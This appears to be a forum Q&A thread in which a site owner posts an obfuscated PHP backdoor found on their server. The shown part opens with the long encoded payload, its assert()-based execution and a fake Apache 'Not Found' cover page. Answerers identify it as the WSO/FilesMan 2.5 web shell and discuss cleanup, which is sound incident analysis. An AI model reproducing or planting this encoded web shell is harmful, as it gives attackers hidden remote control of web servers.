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\'\k29\k29\k29\k3O");'));}else{echo "<h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache Server at ".$_SERVER['HTTP_HOST']." Port 80</address> <style> input { margin:0;background-color:#fff;border:1px solid #fff; } </style>";}
```

Comment: This looks nice, working on it. I'll post results when I am done. In the mean time, may I ask where you got it from?

Answer (score 5, accepted):

At the top level, it's doing something relatively new, using `assert()` to get PHP to dynamically evaluate some PHP source code, because using `eval()` or `preg_replace()` with a 'e' flag is out of fashion.

Under about 10 layers of ROT13 and base54 and gzip obfuscation, it runs Web Shell by oRb ("WSO" or "FilesMan"), version 2.5. WSO is one of the more widespread backdoors, and version 2.5, which you got, is probably the most prevalent version. You can google for "FilesMan" or "WSO" to find many analyses of it. There are even [tutorials](http://dasunhegoda.com/web-shell-wso-security-imawhitehat/915/) [available](https://www.youtube.com/watch?v=JB5mP4x6-Pk).

Comment: Thanks Bruce and bayo15 for Looking into this... I dont know what and how much have been damaged .. I will probably need to clean and start from scratch.

Comment: @user187860 Bruce is right. I can send you the deobfuscated code in case you want it. Anyway, you should think about investing some time into securing your site. Regards, bayo15